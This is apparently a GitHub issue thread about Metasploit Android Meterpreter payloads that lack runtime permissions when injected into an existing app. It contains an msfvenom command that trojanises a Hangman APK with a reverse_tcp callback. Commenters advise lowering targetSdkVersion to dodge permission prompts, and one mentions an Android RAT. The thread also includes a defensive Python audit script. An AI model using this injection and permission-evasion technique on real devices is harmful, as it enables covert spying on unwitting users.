android payload permissions not registered #16208
Comments
Can this be connected with |
Picking up the same problems here with APK files that target any SDK version after Injected Meterpreter Permissions will not be granted automatically and will need to be enabled manually through the Android Device Settings in order for everything to work on the Server Side when using an APK whose SDK version targets anything after
You are correct. Any APK with targetsdkversion < 23 is unlikely to have the ability to handle some permissions at runtime on devices running Android 6.0 Marshmallow or higher. You'll still get a session, but things that require the new runtime permissions, e.g. camera, sdcard access, may throw a SecurityException.
Thinking about this further, the default android payload (without injection) probably has this issue too. Fixing it would require updating the SDK version and breaking backwards compatibility with Android 5 and lower devices. I made some progress here: rapid7/metasploit-payloads#573 but I don't have the bandwidth currently to finish it off. The user would also have to accept the permission(s) via a popup. You're better off dropping a root exploit and running freely :)
I'm pretty sure the default payload doesn't have any problems with the permissions being granted, I think because the payload apk is its own application. I think this seems to arise with injection/templating, but don't quote me on it. I'll have to test this theory later today.
A way around this for the time being is the following, which I've tested on my end with both We can have msfvenom automatically change both the My testing confirms this works in most cases. Unless we have Apktool ignore SDK changes to the |
Bro, how can I edit it manually? I can only use apktool; that's the only compiler I know, and apk easy tool also uses apktool.
Use apktool to decompile the application, then use a text editor to edit things manually.
What do I use to recompile? That's my only problem. I only use apktool, so when I try compiling, apktool changed the SDK version back to 23.
As far as I know that only happens in the manifest, but the targetSdk stays the same in the Apktool.yml. I know this because I use the workaround I've stated above in the "AhMyth Android RAT" project that I currently maintain on my own.
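For anyone vetting APKs rather than building them, the SDK 23 boundary discussed in this thread is a useful review signal: an app that requests dangerous permissions while targeting below 23 does not go through the runtime prompt model. The following is an added example, not code from Metasploit or from any commenter here; it assumes an apktool-decoded `AndroidManifest.xml` and `apktool.yml` passed in as text, and the `audit` and `target_sdk` helpers, the permission subset and the sample inputs are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
RUNTIME_PERMISSION_SDK = 23  # Android 6.0, where runtime permission prompts start

# Subset of Android "dangerous" permissions, chosen for this example.
DANGEROUS = {
    "android.permission.CAMERA",
    "android.permission.RECORD_AUDIO",
    "android.permission.READ_EXTERNAL_STORAGE",
    "android.permission.WRITE_EXTERNAL_STORAGE",
    "android.permission.READ_SMS",
    "android.permission.READ_CONTACTS",
    "android.permission.ACCESS_FINE_LOCATION",
}

def target_sdk(manifest_xml, apktool_yml=""):
    """Return targetSdkVersion from <uses-sdk>, else from apktool.yml sdkInfo."""
    node = ET.fromstring(manifest_xml).find("uses-sdk")
    value = node.get(ANDROID_NS + "targetSdkVersion") if node is not None else None
    if value is None:
        m = re.search(r"targetSdkVersion:\s*'?(\d+)'?", apktool_yml)
        value = m.group(1) if m else None
    return int(value) if value is not None else None

def audit(manifest_xml, apktool_yml=""):
    """Flag APKs that request dangerous permissions but target below SDK 23."""
    root = ET.fromstring(manifest_xml)
    requested = {p.get(ANDROID_NS + "name") for p in root.iter("uses-permission")}
    sdk = target_sdk(manifest_xml, apktool_yml)
    dangerous = sorted(requested & DANGEROUS)
    legacy = sdk is not None and sdk < RUNTIME_PERMISSION_SDK
    return {"target_sdk": sdk, "dangerous": dangerous,
            "flag": bool(dangerous) and legacy}

# Constructed sample inputs (not taken from any real app).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.sample">
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application android:label="Sample"/>
</manifest>"""
SAMPLE_YML = "sdkInfo:\n  minSdkVersion: '16'\n  targetSdkVersion: '22'\n"

if __name__ == "__main__":
    print(audit(SAMPLE_MANIFEST, SAMPLE_YML))
```

Because the manifest and `apktool.yml` can disagree after a rebuild, as noted above, the check reads the manifest first and falls back to `apktool.yml` only when `<uses-sdk>` is absent.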
Steps to reproduce
How'd you do it?
I generated the payload using:
sudo msfvenom -x Hangman.com.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.23 lport=4444 -o android_reverse_tcp_local.apk
I later signed the app and installed on my android device
Opened a meterpreter shell and realized I do not have permissions to upload file or even to use `ls` command
I noticed that the app, on the android has no permissions at all and only after manually adding permissions was I able to upload file or use `ls` in meterpreter session.
This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.
Were you following a specific guide/tutorial or reading documentation?
I followed several tutorials; all of them show the same method
Expected behavior
full permissions on the android device
What should happen?
command like `ls` or `upload` should work
Current behavior
Unable to perform command which require app permission
What happens instead?
I got error messages e.g.:
Metasploit version
Framework Version: 6.1.29-dev
Additional Information
If the issue is encountered within `msfconsole`, please run the `debug` command using the instructions below. If the issue is encountered outside `msfconsole`, or the issue causes `msfconsole` to crash on startup, please delete this section.
msfconsole
set loglevel 3
debug
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
Database Configuration
The database contains the following information:
History
The following commands were ran during the session and before this issue occurred:
Framework Errors
The following framework errors occurred before the issue occurred:
Web Service Errors
The following web service errors occurred before the issue occurred:
Framework Logs
The following framework logs were recorded before the issue occurred:
Web Service Logs
The following web service logs were recorded before the issue occurred:
Version/Install
The versions and install method of your Metasploit setup: